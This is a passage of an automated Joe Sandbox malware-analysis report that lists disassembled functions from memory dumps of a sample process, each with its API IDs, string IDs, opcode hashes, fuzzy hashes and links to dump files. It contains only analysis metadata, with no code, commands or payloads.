                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5012861E2DB8781FA0A9FD5E84137C27A1AF40BD8F445435C92D4B3A0EE3DE5459303
                                                                                                                                                                                                                Function 00007FF8E7149220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: feed
                                                                                                                                                                                                                • API String ID: 1069087923-591414443
                                                                                                                                                                                                                • Opcode ID: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
                                                                                                                                                                                                                • Instruction ID: 03d16053084d929d68953c2ea568a72fe873f46619b06a906f2c63cb9b5bb93a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac8b0854f2a92f6ab02b8bc2362475409b68329c589d35864c18ec7a585ccd28
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17F0D465E0978780FA696BE1E84977823A1AF48BE4F041031C82E0B355EE2DE1898742
                                                                                                                                                                                                                Function 00007FF8E7147400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted$bool
                                                                                                                                                                                                                • API String ID: 1450464846-604167972
                                                                                                                                                                                                                • Opcode ID: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
                                                                                                                                                                                                                • Instruction ID: 3375034d36ade6bad9b4a1c64aece0fe29e3d6251c76152e178aee580cd1a6a6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d01e49ecab393e01afea90eacf9c2f202f3be594d726ec8172ccd587fa77b69
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18F08265F05B82D1D90897A9D8D033C2761BB54BD4F985231D93C462E0FF1CE59A8702
                                                                                                                                                                                                                Function 00007FF8E7149450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: ratio
                                                                                                                                                                                                                • API String ID: 1069087923-4234197119
                                                                                                                                                                                                                • Opcode ID: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
                                                                                                                                                                                                                • Instruction ID: 0b41542114ec2a88075691f09b9e365fab4a46271c0982711a7f3a4c5ee80bf6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e78501f0d171a08875d62dc5a220b8c7582ed247167608e56f1788c768f6b2b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBF0DA65E0D787C0FA29ABA5E80537D23A1AF48BD4F085031C92D1B395EE7CE185C742
                                                                                                                                                                                                                Function 00007FF8E7147490 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted$bool
                                                                                                                                                                                                                • API String ID: 1450464846-232606992
                                                                                                                                                                                                                • Opcode ID: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
                                                                                                                                                                                                                • Instruction ID: 4d09a11c8dfcbf13c23e7a95881d3fde6af4b27bb872159b4a06389f33e6a407
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f25d8b8b92148edbd20cfea33d340808ff6923455f8f104a8005e1d37519fff6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FF01265F09B82D1DA0897A9D8D133C6762BB54BD4F984231D53C463E0EE1CE59AC702
                                                                                                                                                                                                                Function 00007FF8E71490F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: eligible
                                                                                                                                                                                                                • API String ID: 1069087923-1278981203
                                                                                                                                                                                                                • Opcode ID: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
                                                                                                                                                                                                                • Instruction ID: ee1af9ccfdaa6554229f3e66323ef038961b0d26b47f654da654d3427c10509d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4c18aafb7be077d316736c03388e8b3fc999084a9cdbfa9803da876a134bb0e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECF0F8A9E0D787C4FE286BA1E84937C23A1AF48BE0F081071C82D1B355EE6CE0848702
                                                                                                                                                                                                                Function 00007FF8E71482C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted$bool
                                                                                                                                                                                                                • API String ID: 1450464846-2595685569
                                                                                                                                                                                                                • Opcode ID: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
                                                                                                                                                                                                                • Instruction ID: d0e13f2d8d00fd3fc6762c409060aad0b96b6a96d733107b57651adae7de19c2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5445f695030172c0d74eedf3e058939476bfcef05161a035b360ea2110cf5acd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73F01265F05B82D1DE0897A9D8D133C6761BB54BE4FA44231D53C462E0EE1CE59AD702
                                                                                                                                                                                                                Function 00007FF8E7149350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$Dealloc$ArgsAttrCallErr_InstanceObject
                                                                                                                                                                                                                • String ID: reset
                                                                                                                                                                                                                • API String ID: 1069087923-1352515405
                                                                                                                                                                                                                • Opcode ID: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                • Instruction ID: fb61bb5f43e337544298d8f4eb9d4b05d14d0c1f1b1bf4c8346c22d33c588cd1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbdd62e7f99f6cbdd23793489bb35b56453e91b9374609213c62ce4e8be85285
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4F0F865E0D787C0FB29ABA1E84937C23A1AF49BD4F045031C82D0B3A5EE2CE1848742
                                                                                                                                                                                                                Function 00007FF8E68B5D05 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                • Opcode ID: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                • Instruction ID: f781979af693376cb680bd5c5f8a5f8b2ee9ade57636c794bc3e06e779cc0f33
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 794ff9fe6cc79fca3eb8b32a7d0db32e1f3651fea452b404ed335f48275f614f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2E02224B28B9181EA109B82F4882796320AF08FC8F085130EF0E0BF1EEF2CE442C741
                                                                                                                                                                                                                Function 00007FF8E68FBE30 Relevance: 5.2, APIs: 4, Instructions: 223COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                                • Opcode ID: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                • Instruction ID: 754f83acae9da80d882c35bbc642f5757b94278233d200580d5245a2c686d8df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfb0ac5ed84636766fa95ca15f80bffa4fbbf97c836b5acfd07fd3517100af60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC91E272B2C75A82E664CF95A44077A76A0FB84BD0F044135EE4D47B89DF3CE5A18B01
                                                                                                                                                                                                                Function 00007FF8E68FC590 Relevance: 5.2, APIs: 4, Instructions: 220COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                                • Opcode ID: 0fc1c0f9dbc0d14581934465c76cd318a675b62778fa82b6186cc9449e27d309
                                                                                                                                                                                                                • Instruction ID: c7ef97dd48a71e24f4814927835ee37445ae024a399bed8a65faecf0dc0cada7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fc1c0f9dbc0d14581934465c76cd318a675b62778fa82b6186cc9449e27d309
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA91CC72B2CB6A86EA549E96909437A76A0FB44BE0F185239EF5D07BC1DF3CE1508701